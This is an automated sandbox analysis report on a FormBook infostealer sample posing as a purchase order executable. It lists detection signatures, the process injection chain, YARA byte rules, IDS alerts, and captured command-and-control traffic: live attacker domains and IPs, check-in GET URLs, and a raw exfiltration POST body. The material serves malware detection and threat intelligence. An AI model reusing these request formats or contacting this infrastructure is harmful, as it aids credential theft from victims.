Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-000001488.exe

Overview

General Information

Sample name:PO-000001488.exe
Analysis ID:1516889
MD5:ddc551bb780301787ee4cc982af331a9
SHA1:06ddf68af0fdfdb756cf876c36a183f3411166f0
SHA256:557195c150cfc25ab58399c7067bd4abf90afa511b68c5ad6bddcc829e1455b0
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Uncommon Userinit Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Userinit Child Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO-000001488.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\PO-000001488.exe" MD5: DDC551BB780301787EE4CC982AF331A9)
    • PO-000001488.exe (PID: 4032 cmdline: "C:\Users\user\Desktop\PO-000001488.exe" MD5: DDC551BB780301787EE4CC982AF331A9)
      • MpfhURuSBZcuS.exe (PID: 5996 cmdline: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • userinit.exe (PID: 4676 cmdline: "C:\Windows\SysWOW64\userinit.exe" MD5: 24892AC6E39679E3BD3B0154DE97C53A)
          • MpfhURuSBZcuS.exe (PID: 6360 cmdline: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.PO-000001488.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.PO-000001488.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2eff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.PO-000001488.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.PO-000001488.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Userinit Child Process
            Source: Process startedAuthor: Tom Ueltschi (@c_APT_ure), Tim Shelton: Data: Command: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, NewProcessName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, OriginalFileName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 4676, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , ProcessId: 6360, ProcessName: MpfhURuSBZcuS.exe
            Sigma detected: Suspicious Userinit Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Samir Bousseaden (idea): Data: Command: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, NewProcessName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, OriginalFileName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 4676, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , ProcessId: 6360, ProcessName: MpfhURuSBZcuS.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T17:17:19.548794+020020507451Malware Command and Control Activity Detected192.168.2.863689188.114.97.380TCP
            2024-09-24T17:17:43.191949+020020507451Malware Command and Control Activity Detected192.168.2.863693199.59.243.22780TCP
            2024-09-24T17:17:56.931031+020020507451Malware Command and Control Activity Detected192.168.2.863700198.252.106.19180TCP
            2024-09-24T17:18:10.103482+020020507451Malware Command and Control Activity Detected192.168.2.8637043.33.130.19080TCP
            2024-09-24T17:18:23.779067+020020507451Malware Command and Control Activity Detected192.168.2.863708148.251.114.23380TCP
            2024-09-24T17:18:37.074245+020020507451Malware Command and Control Activity Detected192.168.2.863712209.74.95.2980TCP
            2024-09-24T17:18:50.786085+020020507451Malware Command and Control Activity Detected192.168.2.863716199.59.243.22780TCP
            2024-09-24T17:19:03.958791+020020507451Malware Command and Control Activity Detected192.168.2.8637203.33.130.19080TCP
            2024-09-24T17:19:25.919517+020020507451Malware Command and Control Activity Detected192.168.2.86372452.223.13.4180TCP
            2024-09-24T17:19:40.565485+020020507451Malware Command and Control Activity Detected192.168.2.86372838.47.232.14480TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO-000001488.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: PO-000001488.exeReversingLabs: Detection: 65%
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO-000001488.exeJoe Sandbox ML: detected
            Source: PO-000001488.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO-000001488.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MpfhURuSBZcuS.exe, 00000007.00000002.3307759780.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp, MpfhURuSBZcuS.exe, 00000009.00000000.1835592215.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-000001488.exe, PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdbGCTL source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00ABC290 FindFirstFileW,FindNextFileW,FindClose,8_2_00ABC290
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 4x nop then xor eax, eax8_2_00AA9B50
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 4x nop then mov ebx, 00000004h8_2_032304DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63724 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63708 -> 148.251.114.233:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63704 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63720 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63712 -> 209.74.95.29:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63693 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63700 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63689 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63728 -> 38.47.232.144:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63716 -> 199.59.243.227:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.suarahati20.xyz
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: HAWKHOSTCA HAWKHOSTCA
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ttiz/?L4Ml=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&VX=XZGx- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.cc101.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /x7gz/?VX=XZGx-&L4Ml=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.popin.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tuad/?L4Ml=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&VX=XZGx- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.suarahati20.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /u85y/?VX=XZGx-&L4Ml=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /30vc/?L4Ml=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&VX=XZGx- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.eslameldaramlly.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gfz9/?VX=XZGx-&L4Ml=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.pofgof.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8lrv/?L4Ml=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&VX=XZGx- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.donante-de-ovulos.bizConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /i5ct/?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.airtech365.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8q1d/?L4Ml=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==&VX=XZGx- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.longfilsalphonse.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wqu9/?L4Ml=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&VX=XZGx- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.yu35n.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.asstl.online
            Source: global trafficDNS traffic detected: DNS query: www.cc101.pro
            Source: global trafficDNS traffic detected: DNS query: www.popin.space
            Source: global trafficDNS traffic detected: DNS query: www.suarahati20.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dhkatp.vip
            Source: global trafficDNS traffic detected: DNS query: www.eslameldaramlly.site
            Source: global trafficDNS traffic detected: DNS query: www.pofgof.pro
            Source: global trafficDNS traffic detected: DNS query: www.donante-de-ovulos.biz
            Source: global trafficDNS traffic detected: DNS query: www.airtech365.net
            Source: global trafficDNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
            Source: global trafficDNS traffic detected: DNS query: www.yu35n.top
            Source: global trafficDNS traffic detected: DNS query: www.52ywq.vip
            Source: unknownHTTP traffic detected: POST /x7gz/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.popin.spaceOrigin: http://www.popin.spaceReferer: http://www.popin.space/x7gz/Content-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36Data Raw: 4c 34 4d 6c 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 74 79 50 63 32 30 6f 6c 39 4c 68 52 2f 58 30 30 66 46 6d 38 42 67 7a 36 56 57 61 7a 7a 69 2b 4a 6f 63 41 59 4e 76 79 73 77 4e 4e 67 74 34 67 77 44 79 52 5a 4c 6c 76 67 37 33 70 35 38 6b 6a 75 63 68 57 6a 63 49 35 58 61 41 72 55 44 59 77 74 42 58 31 6d 45 63 42 78 4e 53 59 6c 33 79 36 66 68 4a 68 63 78 6e 7a 66 5a 72 62 31 6f 5a 44 30 51 50 50 62 48 4b 34 49 51 48 59 46 78 63 39 47 6d 32 71 44 6b 45 30 33 52 71 48 57 36 6e 4f 61 44 51 43 72 68 75 52 58 68 78 6b 74 44 54 67 77 48 77 39 6d 77 37 43 30 4b 34 6f 4d 4b 73 72 47 62 76 71 59 79 69 62 37 65 58 77 3d Data Ascii: L4Ml=f07BeQ/6F/4ytyPc20ol9LhR/X00fFm8Bgz6VWazzi+JocAYNvyswNNgt4gwDyRZLlvg73p58kjuchWjcI5XaArUDYwtBX1mEcBxNSYl3y6fhJhcxnzfZrb1oZD0QPPbHK4IQHYFxc9Gm2qDkE03RqHW6nOaDQCrhuRXhxktDTgwHw9mw7C0K4oMKsrGbvqYyib7eXw=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 24 Sep 2024 15:17:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 